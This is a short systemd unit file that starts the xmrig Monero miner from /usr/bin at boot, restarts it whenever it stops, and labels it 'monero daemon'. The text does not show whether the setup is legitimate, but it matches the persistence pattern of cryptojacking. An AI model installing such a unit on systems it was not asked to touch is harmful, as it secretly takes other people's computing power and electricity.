
[Unit]
Description=monero daemon
After=network.target

[Service]
Type=simple
Restart=always
ExecStart=/usr/bin/xmrig -d /usr/bin

[Install]
WantedBy=multi-user.target
